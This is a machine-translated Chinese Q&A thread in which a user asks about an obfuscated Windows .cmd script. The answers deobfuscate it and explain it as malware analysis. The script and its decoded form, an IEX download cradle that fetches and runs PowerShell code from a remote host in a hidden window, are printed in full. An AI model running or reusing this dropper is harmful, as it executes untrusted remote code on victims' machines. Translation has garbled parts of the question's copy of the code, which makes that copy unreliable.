今天我收到了一些非常有趣的东西。这是一个带有加密命令的 .cmd 脚本。有人能告诉我这是什么加密吗?可以解密吗?或者 Windows 如何读取这种类型的命令?
我在 Win7 VM 中执行了此代码,但什么也没发生。我寻找一些奇怪的东西,例如服务、进程或环境变量......一切看起来都很好
!@echo off
cd %SystemRoot%\System32
设置 uQmFERgK=GFYpgWoTABQSI5bRJVKaHwNjcO1tPlf8k4zMv3dsUeXqEZxDCi62L09u7nrmyh
设置 JD=W^i^n
设置 beoxNuYr=^d^o^w
设置 fSUXCI=^sPo
设置 XFY=^we^r
设置 NKHoDvv=She
设置 DdAvVw=^l^l\
设置 BnCCBy=v^1^.
设置 xuuyxYlz=^0^\p^o
设置 zEonzEj=^w^e
设置 nqfsDHhb=r^sh
设置 tsaNePh=el^l
设置 qIrKO=^.e^x
设置 qlLkftpA=^e -^n
设置 pZckbH=op^
设置 MrCpkeh=-w
设置 kGm=^i^n ^1^ -
设置日期=%uQmFERgK:~49,1%%uQmFERgK:~44,1%%uQmFERgK:~42,1%
(^"%uQmFERgK:~12,1%%uQmFERgK:~44,1%%uQmFERgK:~42,1%
(%uQmFERgK:〜22,1%%uQmFERgK:〜44,1%%uQmFERgK:〜5,1%-%uQmFERgK:〜25,1%%uQmFERgK:〜9,1%%uQmFERgK:〜16,1%%uQmFERgK:〜41,1%%uQmFERgK:〜24,1%%uQmFERgK:〜7,1% %uQmFERgK:~22,1%%uQmFERgK:~41,1%%uQmFERgK:~27,1%。%uQmFERgK:~21,1%%uQmFERgK:~41,1%%uQmFERgK:~9,1%%uQmFERgK:~48,1%%uQmFERgK:~52,1%%uQmFERgK:~12,1%%uQmFE RgK:~44,1%%uQmFERgK:~57,1%%uQmFERgK:~27,1%).%uQmFERgK:~38,1%%uQmFERgK:~25,1%%uQmFERgK:~21,1%%uQmFERgK:~22,1%%uQmFERgK:~52,1%%uQmFERgK:~6,1%%uQmFERgK:~ 8,1%%uQmFERgK:~38,1%%uQmFERgK:~11,1%%uQmFERgK:~7,1%%uQmFERgK:~15,1%%uQmFERgK:~49,1%%uQmFERgK:~57,1%%uQmFERgK:~4,1%('%uQmFERgK:~61,1%%uQmFERgK:~27,1%%u QmFERgK:~27,1%%uQmFERgK:~3,1%%uQmFERgK:~39,1%://%uQmFERgK:~38,1%%uQmFERgK:~29,1%%uQmFERgK:~59,1%.%uQmFERgK:~3,1%%uQmFERgK:~19,1%%uQmFERgK:~57,1%%uQmFER gK:~57,1%%uQmFERgK:~6,1%%uQmFERgK:~38,1%。%uQmFERgK:~24,1%%uQmFERgK:~6,1%%uQmFERgK:~59,1%/?%uQmFERgK:~38,1%%uQmFERgK:~5,1%%uQmFERgK:~9,1%%uQmFERgK:~32, 1%%uQmFERgK:~55,1%%uQmFERgK:~4,1%%uQmFERgK:~25,1%%uQmFERgK:~8,1%%uQmFERgK:~2,1%%uQmFERgK:~50,1%%uQmFERgK:~35,1%%uQmFERgK:~52,1%/%uQmFERgK:~16,1%%uQmFER gK:~27,1%%uQmFERgK:~9,1%%uQmFERgK:~41,1%%uQmFERgK:~31,1%%uQmFERgK:~3,1%%uQmFERgK:~18,1%%uQmFERgK:~7,1%%uQmFERgK:~35,1%%uQmFERgK:~48,1%%uQmFERgK:~11,1% %uQmFERgK:~4,1%%uQmFERgK:~3,1%%uQmFERgK:~15,1%%uQmFERgK:~41,1%%uQmFERgK:~17,1%%uQmFERgK:~42,1%%uQmFERgK:~61,1%%uQmFERgK:~45,1%+%uQmFERgK:~43,1%%uQmFERg K:~48,1%%uQmFERgK:~23,1%%uQmFERgK:~2,1%%uQmFERgK:~42,1%%uQmFERgK:~21,1%%uQmFERgK:~61,1%%uQmFERgK:~41,1%%uQmFERgK:~20,1%%uQmFERgK:~30,1%%uQmFERgK:~39,1 %%uQmFERgK:~48,1%%uQmFERgK:~12,1%%uQmFERgK:~52,1%%uQmFERgK:~42,1%%uQmFERgK:~19,1%%uQmFERgK:~37,1%%uQmFERgK:~1,1%%uQmFERgK:~23,1%%uQmFERgK:~37,1%%uQmFE RgK:~21,1%%uQmFERgK:~6,1%%uQmFERgK:~57,1%%uQmFERgK:~38,1%%uQmFERgK:~23,1%%uQmFERgK:~31,1%%uQmFERgK:~60,1%%uQmFERgK:~15,1%%uQmFERgK:~25,1%%uQmFERgK:~11 ,1%%uQmFERgK:~39,1%%uQmFERgK:~25,1%%uQmFERgK:~11,1%%uQmFERgK:~25,1%%uQmFERgK:~43,1%%uQmFERgK:~23,1%%uQmFERgK:~58,1%%uQmFERgK:~23,1%%uQmFERgK:~14,1%%uQm FERgK:~25,1%%uQmFERgK:~5,1%%uQmFERgK:~55,1%%uQmFERgK:~58,1%%uQmFERgK:~52,1%%uQmFERgK:~22,1%%uQmFERgK:~7,1%%uQmFERgK:~36,1%%uQmFERgK:~12,1%G%uQmFERgK:~ 8,1%%uQmFERgK:~19,1%%uQmFERgK:~8,1%%uQmFERgK:~6,1%%uQmFERgK:~17,1%%uQmFERgK:~21,1%%uQmFERgK:~37,1%%uQmFERgK:~32,1%%uQmFERgK:~47,1%%uQmFERgK:~31,1%%uQmF ERgK:~51,1%/%uQmFERgK:~5,1%%uQmFERgK:~58,1%%uQmFERgK:~12,1%%uQmFERgK:~28,1%%uQmFERgK:~8,1%%uQmFERgK:~14,1%%uQmFERgK:~37,1%%uQmFERgK:~17,1%%uQmFERgK:~3 5,1%%uQmFERgK:~26,1%%uQmFERgK:~8,1%%uQmFERgK:~24,1%%uQmFERgK:~30,1%%uQmFERgK:~3,1%%uQmFERgK:~23,1%%uQmFERgK:~29,1%%uQmFERgK:~21,1%%uQmFERgK:~3,1%')^");
echo %%date%% | %JD%%beoxNuYr%%fSUXCI%%XFY%%NKHoDvv%%DdAvVw%%BnCCBy%%xuuyxYlz%%zEonzEj%%nqfsDHhb%%tsaNePh%%qIrKO%%qlLkftpA%%pZckbH%%MrCpkeh%%kGm%
答案1
为了对代码进行反混淆(可能不完整且有点混乱),你可以运行前进行调整以便仅显示任何危险的操作而不是运行它们
如下所示评论代码片段:
@echo off
ECHO cd %SystemRoot%\System32
:: ↑↑ there is nothing to do in the "%SystemRoot%\System32" folder
set uQmFERgK=GFYpgWoTABQSI5bRJVKaHwNjcO1tPlf8k4zMv3dsUeXqEZxDCi62L09u7nrmyh
set JD=W^i^n
set beoxNuYr=^d^o^w
set fSUXCI=^sPo
set XFY=^we^r
set NKHoDvv=She
set DdAvVw=^l^l\
set BnCCBy=v^1^.
set xuuyxYlz=^0^\p^o
set zEonzEj=^w^e
set nqfsDHhb=r^sh
set tsaNePh=el^l
set qIrKO=^.e^x
set qlLkftpA=^e -^n
set pZckbH=op^
set MrCpkeh=-w
set kGm=^i^n ^1^ -
ECHO set date=%uQmFERgK:~49,1%%uQmFERgK:~44,1%%uQmFERgK:~42,1% (^"%uQmFERgK:~12,1%%uQmFERgK:~44,1%%uQmFERgK:~42,1% (%uQmFERgK:~22,1%%uQmFERgK:~44,1%%uQmFERgK:~5,1%-%uQmFERgK:~25,1%%uQmFERgK:~9,1%%uQmFERgK:~16,1%%uQmFERgK:~41,1%%uQmFERgK:~24,1%%uQmFERgK:~7,1% %uQmFERgK:~22,1%%uQmFERgK:~41,1%%uQmFERgK:~27,1%.%uQmFERgK:~21,1%%uQmFERgK:~41,1%%uQmFERgK:~9,1%%uQmFERgK:~48,1%%uQmFERgK:~52,1%%uQmFERgK:~12,1%%uQmFERgK:~44,1%%uQmFERgK:~57,1%%uQmFERgK:~27,1%).%uQmFERgK:~38,1%%uQmFERgK:~25,1%%uQmFERgK:~21,1%%uQmFERgK:~22,1%%uQmFERgK:~52,1%%uQmFERgK:~6,1%%uQmFERgK:~8,1%%uQmFERgK:~38,1%%uQmFERgK:~11,1%%uQmFERgK:~7,1%%uQmFERgK:~15,1%%uQmFERgK:~49,1%%uQmFERgK:~57,1%%uQmFERgK:~4,1%('%uQmFERgK:~61,1%%uQmFERgK:~27,1%%uQmFERgK:~27,1%%uQmFERgK:~3,1%%uQmFERgK:~39,1%://%uQmFERgK:~38,1%%uQmFERgK:~29,1%%uQmFERgK:~59,1%.%uQmFERgK:~3,1%%uQmFERgK:~19,1%%uQmFERgK:~57,1%%uQmFERgK:~57,1%%uQmFERgK:~6,1%%uQmFERgK:~38,1%.%uQmFERgK:~24,1%%uQmFERgK:~6,1%%uQmFERgK:~59,1%/?%uQmFERgK:~38,1%%uQmFERgK:~5,1%%uQmFERgK:~9,1%%uQmFERgK:~32,1%%uQmFERgK:~55,1%%uQmFERgK:~4,1%%uQmFERgK:~25,1%%uQmFERgK:~8,1%%uQmFERgK:~2,1%%uQmFERgK:~50,1%%uQmFERgK:~35,1%%uQmFERgK:~52,1%/%uQmFERgK:~16,1%%uQmFERgK:~27,1%%uQmFERgK:~9,1%%uQmFERgK:~41,1%%uQmFERgK:~31,1%%uQmFERgK:~3,1%%uQmFERgK:~18,1%%uQmFERgK:~7,1%%uQmFERgK:~35,1%%uQmFERgK:~48,1%%uQmFERgK:~11,1%%uQmFERgK:~4,1%%uQmFERgK:~3,1%%uQmFERgK:~15,1%%uQmFERgK:~41,1%%uQmFERgK:~17,1%%uQmFERgK:~42,1%%uQmFERgK:~61,1%%uQmFERgK:~45,1%+%uQmFERgK:~43,1%%uQmFERgK:~48,1%%uQmFERgK:~23,1%%uQmFERgK:~2,1%%uQmFERgK:~42,1%%uQmFERgK:~21,1%%uQmFERgK:~61,1%%uQmFERgK:~41,1%%uQmFERgK:~20,1%%uQmFERgK:~30,1%%uQmFERgK:~39,1%%uQmFERgK:~48,1%%uQmFERgK:~12,1%%uQmFERgK:~52,1%%uQmFERgK:~42,1%%uQmFERgK:~19,1%%uQmFERgK:~37,1%%uQmFERgK:~1,1%%uQmFERgK:~23,1%%uQmFERgK:~37,1%%uQmFERgK:~21,1%%uQmFERgK:~6,1%%uQmFERgK:~57,1%%uQmFERgK:~38,1%%uQmFERgK:~23,1%%uQmFERgK:~31,1%%uQmFERgK:~60,1%%uQmFERgK:~15,1%%uQmFERgK:~25,1%%uQmFERgK:~11,1%%uQmFERgK:~39,1%%uQmFERgK:~25,1%%uQmFERgK:~11,1%%uQmFERgK:~25,1%%uQmFERgK:~43,1%%uQmFERgK:~23,1%%uQmFERgK:~58,1%%uQmFERgK:~23,1%%uQmFERgK:~14,1%%uQmFERgK:~25,1%%uQmFERgK:~5,1%%uQmFERgK:~55,1%%uQmFERgK:~58,1%%uQmFERgK:~52,1%%uQmFERgK:~22,1%%uQmFERgK:~7,1%%uQmFERgK:~36,1%%uQmFERgK:~12,1%G%uQmFERgK:~8,1%%uQmFERgK:~19,1%%uQmFERgK:~8,1%%uQmFERgK:~6,1%%uQmFERgK:~17,1%%uQmFERgK:~21,1%%uQmFERgK:~37,1%%uQmFERgK:~32,1%%uQmFERgK:~47,1%%uQmFERgK:~31,1%%uQmFERgK:~51,1%/%uQmFERgK:~5,1%%uQmFERgK:~58,1%%uQmFERgK:~12,1%%uQmFERgK:~28,1%%uQmFERgK:~8,1%%uQmFERgK:~14,1%%uQmFERgK:~37,1%%uQmFERgK:~17,1%%uQmFERgK:~35,1%%uQmFERgK:~26,1%%uQmFERgK:~8,1%%uQmFERgK:~24,1%%uQmFERgK:~30,1%%uQmFERgK:~3,1%%uQmFERgK:~23,1%%uQmFERgK:~29,1%%uQmFERgK:~21,1%%uQmFERgK:~3,1%')^");
:: ↑↑↑ ↑↑↑↑ volatile environment variable "date" contains current system date
ECHO echo %%date%% ^| %JD%%beoxNuYr%%fSUXCI%%XFY%%NKHoDvv%%DdAvVw%%BnCCBy%%xuuyxYlz%%zEonzEj%%nqfsDHhb%%tsaNePh%%qIrKO%%qlLkftpA%%pZckbH%%MrCpkeh%%kGm%
:: ↑↑ escape the pipe operator
结果代码:
cd C:\WINDOWS\System32
set date=iEX ("IEX (NEW-OBJecT Net.weBCLIEnt).dOwNLoAdSTRing('https://dlm.pannod.com/?dWBkugOAY6ML/JtBe8pKTMCSgpReVXhZ+qCjYXwheHfsCILXa3Fj3wondj8yROSsOSOqjrjbOWurLNTvIGAaAoVw3kD82/WrIPAb3VM1Acfpjlwp')");
echo %date% | WindowsPowerShell\v1.0\powershell.exe -nop -win 1 -
表明这是试图
- 下载一些代码来自
https://dlm.pannod.com/,和 - 运行该代码在 Windows Powershell 中使用
Invoke-Expression命令(查看IEX别名):
更多资源(必读,未完成):
- (命令参考)Windows CMD 命令行的 AZ 索引
- (其他细节)Windows CMD Shell 命令行语法
- (
%uQmFERgK:~49,1%ETC。)提取变量的一部分(子字符串) - 变量编辑/替换
答案2
我们希望并假设这个 Win7 VM 是一个沙盒。由于这个脚本是模糊的,因此在可恢复的沙盒中调查它是可以的。否则这简直是愚蠢的。
从这个来看,它首先附加到system32\文件夹,启动 PowerShell 并在其中执行一些操作。现在将沙盒恢复到其原始状态并启动进程监控首先。这样你就可以捕获将对系统进行哪些更改。
首先关注文件和注册表写入,然后关注可能的网络连接下载更多恶意软件。变化也可能很小,可能刚好足以为以后的攻击提供访问权限。如果您仔细进行调查,请分享其结果作为自我回答。